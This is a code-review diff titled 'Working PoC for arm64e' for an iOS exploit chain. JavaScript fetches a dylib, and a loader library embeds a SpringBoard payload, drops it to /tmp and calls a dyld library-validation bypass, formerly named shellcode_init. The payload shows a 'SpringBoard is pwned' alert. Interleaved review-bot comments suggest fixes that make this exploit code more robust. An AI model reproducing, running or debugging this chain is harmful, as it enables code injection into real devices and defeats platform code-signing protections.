Working PoC for arm64e
+1
-1
@@ -1161,7 +1161,7 @@ function YA() {/* Original: YA → resolveSymbols */
|
||||
// Fetch a single file as ArrayBuffer
|
||||
fetchBin(url) {
|
||||
// Override entry2_type0x0f.dylib
|
||||
url = url.replace(/\/entry2_type0x0f.dylib$/g, "/../../SpringBoardTweak/.theos/obj/arm64" + (platformModule.platformState.hasPAC?"e":"") + "/SpringBoardTweak.dylib");
|
||||
url = url.replace(/\/entry2_type0x0f.dylib$/g, "/../../TweakLoader/.theos/obj/arm64" + (platformModule.platformState.hasPAC?"e":"") + "/TweakLoader.dylib");
|
||||
|
||||
window.log("Downloading " + url);
|
||||
return new Promise((resolve, reject) => {
|
||||
|
||||
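Review bot: The `.` in the pattern `/\/entry2_type0x0f.dylib$/g` on the replacement line is an unescaped metacharacter (it matches any character, not only a dot) and the `g` flag is redundant with the `$` anchor; write `url = url.replace(/\/entry2_type0x0f\.dylib$/, "/../../TweakLoader/.theos/obj/arm64" + (platformModule.platformState.hasPAC ? "e" : "") + "/TweakLoader.dylib");`. The rewritten path also points straight into a theos build tree (`.theos/obj/...`), which presumably only resolves when the page is served from a local checkout, so a one-line comment such as `// dev-only: serves TweakLoader.dylib straight from the theos build output` would spare the next reader a guess. `fetchBin` begins and ends outside the hunk.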
@@ -0,0 +1,18 @@
|
||||
TARGET := iphone:clang:latest:15.0
|
||||
ARCHS = arm64 arm64e
|
||||
FINALPACKAGE = 1
|
||||
STRIP = 0
|
||||
GO_EASY_ON_ME = 1
|
||||
|
||||
include $(THEOS)/makefiles/common.mk
|
||||
|
||||
SUBPROJECTS += SpringBoardTweak
|
||||
include $(THEOS_MAKE_PATH)/aggregate.mk
|
||||
|
||||
LIBRARY_NAME = TweakLoader
|
||||
TweakLoader_FILES = TweakLoader.m lv_bypass.c
|
||||
TweakLoader_CFLAGS = -fno-objc-arc
|
||||
TweakLoader_LDFLAGS = -sectcreate __TEXT __SBTweak $(THEOS_OBJ_DIR)/SpringBoardTweak.dylib
|
||||
TweakLoader_INSTALL_PATH = /usr/local/lib
|
||||
|
||||
include $(THEOS_MAKE_PATH)/library.mk
|
||||
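Review bot: `TweakLoader_LDFLAGS = -sectcreate __TEXT __SBTweak $(THEOS_OBJ_DIR)/SpringBoardTweak.dylib` embeds the subproject's output, but nothing in this Makefile states or enforces that dependency: `aggregate.mk` and `library.mk` are both included, and the subproject presumably writes its dylib under its own `SpringBoardTweak/.theos/obj/<arch>/` (the JavaScript hunk fetches it from exactly that location), so unless theos redirects the subproject into the parent's `$(THEOS_OBJ_DIR)` the link step may read a stale or missing file. Worth verifying the path against the subproject's actual output directory, and documenting the coupling with a comment such as `# TweakLoader embeds SpringBoardTweak.dylib via -sectcreate; the SpringBoardTweak subproject must be built first and the __SBTweak section name must match the getsectiondata lookup in TweakLoader.m`. With `ARCHS = arm64 arm64e`, each per-arch link embeds whatever that single path holds at the time, so a mismatched-arch payload would not be caught at build time either.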
@@ -8,8 +8,8 @@ include $(THEOS)/makefiles/common.mk
|
||||
|
||||
LIBRARY_NAME = SpringBoardTweak
|
||||
|
||||
SpringBoardTweak_FILES = SpringBoardTweak.m lv_bypass.c
|
||||
SpringBoardTweak_CFLAGS = -fno-objc-arc
|
||||
SpringBoardTweak_FILES = SpringBoardTweak.m
|
||||
SpringBoardTweak_CFLAGS = -fobjc-arc
|
||||
SpringBoardTweak_INSTALL_PATH = /usr/local/lib
|
||||
|
||||
include $(THEOS_MAKE_PATH)/library.mk
|
||||
@@ -0,0 +1,15 @@
|
||||
@import UIKit;
|
||||
|
||||
__attribute__((constructor)) static void init() {
|
||||
dispatch_async(dispatch_get_main_queue(), ^{
|
||||
UIAlertController *alert = [UIAlertController alertControllerWithTitle:@"Coruna" message:@"SpringBoard is pwned" preferredStyle:UIAlertControllerStyleAlert];
|
||||
[alert addAction:[UIAlertAction actionWithTitle:@"Install TrollHelper (ETA SON)" style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
|
||||
|
||||
}]];
|
||||
[alert addAction:[UIAlertAction actionWithTitle:@"Respring" style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
|
||||
exit(0);
|
||||
}]];
|
||||
[alert addAction:[UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:nil]];
|
||||
[[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil];
|
||||
});
|
||||
}
|
||||
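Review bot: The present call at `[[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil];` has no guard: `keyWindow` is deprecated since iOS 13 and can be nil under multiple scenes, and if the root controller is already presenting something UIKit drops the request with only a console warning, so the alert silently never appears. Walk to the topmost presented controller and return on nil before presenting. As a point of style, `static void init()` declares an unspecified C parameter list and reuses a name every ObjC reader associates with `-init`; `static void coruna_init(void)` reads better. The empty handler for the "Install TrollHelper (ETA SON)" action would also benefit from an explicit `// TODO: not implemented yet` so it is not mistaken for an accidental omission.
```objc
// … unchanged: alert construction and the three actions …
UIViewController *top = [UIApplication sharedApplication].keyWindow.rootViewController;
while (top.presentedViewController) {
    top = top.presentedViewController;
}
if (!top) return;  // no window/root yet; nothing to present on
[top presentViewController:alert animated:YES completion:nil];
```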
@@ -1,6 +1,5 @@
|
||||
@import Darwin;
|
||||
@import MachO;
|
||||
@import UIKit;
|
||||
#include <mach-o/ldsyms.h> /* _mh_dylib_header */
|
||||
|
||||
// Function pointers
|
||||
@@ -8,7 +7,8 @@ extern pthread_t pthread_main_thread_np(void);
|
||||
extern void _pthread_set_self(pthread_t p);
|
||||
void (*_abort)(void);
|
||||
int (*_close)(int);
|
||||
void * (*_dlsym)(void *, const char *);
|
||||
void* (*_dlsym)(void *, const char *);
|
||||
uint8_t* (*_getsectiondata)(const struct mach_header_64 *, const char *, const char *, unsigned long *);
|
||||
thread_t (*_mach_thread_self)(void);
|
||||
int (*_open)(const char *, int, ...);
|
||||
void (*__pthread_set_self)(pthread_t p);
|
||||
@@ -17,45 +17,17 @@ int (*_strncmp)(const char *s1, const char *s2, size_t n);
|
||||
kern_return_t (*_thread_terminate)(mach_port_t);
|
||||
int (*_write)(int, const void *, size_t);
|
||||
|
||||
int shellcode_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path);
|
||||
int dyld_lv_bypass_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path);
|
||||
|
||||
static uintptr_t _get_text_vmaddr(const struct mach_header_64 *mh) {
|
||||
struct load_command *lc = (void*)((uintptr_t)mh + sizeof(struct mach_header_64));
|
||||
for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) {
|
||||
if (lc->cmd != LC_SEGMENT_64) continue;
|
||||
struct segment_command_64 *seg = (void*)lc;
|
||||
if (_strncmp(seg->segname, "__TEXT", 6) == 0)
|
||||
return seg->vmaddr;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
static size_t macho_size_from_header(const struct mach_header_64 *mh) {
|
||||
uintptr_t base = (uintptr_t)mh;
|
||||
uintptr_t text_vm = _get_text_vmaddr(mh);
|
||||
uintptr_t slide = base - text_vm; // ASLR slide
|
||||
|
||||
struct load_command *lc = (void*)(base + sizeof(struct mach_header_64));
|
||||
for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) {
|
||||
if (lc->cmd != LC_SEGMENT_64) continue;
|
||||
struct segment_command_64 *seg = (void*)lc;
|
||||
if (_strncmp(seg->segname, "__LINKEDIT", 10) != 0) continue;
|
||||
|
||||
// vmaddr + slide = actual mapped address of __LINKEDIT
|
||||
// end = that + vmsize
|
||||
return (seg->vmaddr + slide + seg->vmsize) - base;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
const char *save_myself(void) {
|
||||
const char *path = "/tmp/SpringBoardTweak.dylib";
|
||||
const struct mach_header_64 *header = (struct mach_header_64 *)&_mh_dylib_header;
|
||||
size_t size = macho_size_from_header(header);
|
||||
int fd = _open(path, O_RDWR | O_CREAT | O_TRUNC, 0755);
|
||||
if (fd < 0) _abort();
|
||||
const char *save_actual_dylib(void) {
|
||||
const char *path = "/tmp/actual.dylib";
|
||||
int fd = _open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);
|
||||
|
||||
if (_write(fd, header, size) != size) {
|
||||
// -sectcreate __TEXT __actual_dylib <path to dylib>
|
||||
|
||||
size_t dylib_size = 0;
|
||||
const char *dylib = (const char *)_getsectiondata((struct mach_header_64 *)&_mh_dylib_header, "__TEXT", "__SBTweak", &dylib_size);
|
||||
if (_write(fd, dylib, dylib_size) != dylib_size) {
|
||||
_abort();
|
||||
}
|
||||
_close(fd);
|
||||
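Review bot: The descriptor from `int fd = _open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);` is used unchecked — the removed `save_myself` had `if (fd < 0) _abort();` and the new function drops it, so a failed open goes straight into `_write(-1, …)` and the eventual abort no longer says which step failed; add `if (fd < 0) _abort();` right after the open. Likewise a NULL return from `_getsectiondata` (with `dylib_size` left at 0) makes the zero-byte write succeed and hands an empty `/tmp/actual.dylib` to the loader, so add `if (!dylib || dylib_size == 0) _abort();` after the lookup. The comment `// -sectcreate __TEXT __actual_dylib <path to dylib>` names a section that differs from the `__SBTweak` the code looks up and the Makefile creates; make it `// -sectcreate __TEXT __SBTweak <path to dylib>`. For a fixed, predictable path in `/tmp`, opening with `O_EXCL` (or unlinking first) avoids truncating and following whatever already sits at that name. `save_actual_dylib` continues past the end of the hunk.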
@@ -85,6 +57,7 @@ int last(void) {
|
||||
|
||||
_abort = _dlsym(RTLD_DEFAULT, "abort");
|
||||
_close = _dlsym(RTLD_DEFAULT, "close");
|
||||
_getsectiondata = _dlsym(RTLD_DEFAULT, "getsectiondata");
|
||||
_mach_thread_self = _dlsym(RTLD_DEFAULT, "mach_thread_self");
|
||||
_open = _dlsym(RTLD_DEFAULT, "open");
|
||||
_strncmp = _dlsym(RTLD_DEFAULT, "strncmp");
|
||||
@@ -92,8 +65,8 @@ int last(void) {
|
||||
_write = _dlsym(RTLD_DEFAULT, "write");
|
||||
|
||||
// setup dyld validation bypass
|
||||
const char *path = save_myself();
|
||||
shellcode_init(_dlsym, path);
|
||||
const char *path = save_actual_dylib();
|
||||
dyld_lv_bypass_init(_dlsym, path);
|
||||
|
||||
// should not return
|
||||
_thread_terminate(_mach_thread_self());
|
||||
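Review bot: The `int` result of `dyld_lv_bypass_init(_dlsym, path);` is discarded, so a failed bypass setup is indistinguishable from success before the thread is terminated on the next line; assuming the usual 0-on-success convention, `if (dyld_lv_bypass_init(_dlsym, path) != 0) _abort();` would at least make the failure observable. The previous `shellcode_init` call had the same shape, so this is not new to the commit, but the rename is the natural moment to fix it. `last` begins outside the hunk.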
@@ -1,5 +1,5 @@
|
||||
Package: com.yourcompany.springboardtweak
|
||||
Name: SpringBoardTweak
|
||||
Package: com.yourcompany.TweakLoader
|
||||
Name: TweakLoader
|
||||
Version: 0.0.1
|
||||
Architecture: iphoneos-arm
|
||||
Description: An awesome library of some sort!!
|
||||
@@ -34,7 +34,7 @@ static mach_port_t _mach_task_self_;
|
||||
kern_return_t builtin_vm_protect(mach_port_name_t task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_max, vm_prot_t new_prot);
|
||||
static void init_bypassDyldLibValidation(void);
|
||||
|
||||
int shellcode_init(void * (*_dlsym)(void* handle, const char* symbol),
|
||||
int dyld_lv_bypass_init(void * (*_dlsym)(void* handle, const char* symbol),
|
||||
const char *next_stage_dylib_path)
|
||||
{
|
||||
_printf = _dlsym(RTLD_DEFAULT, "printf");
|
||||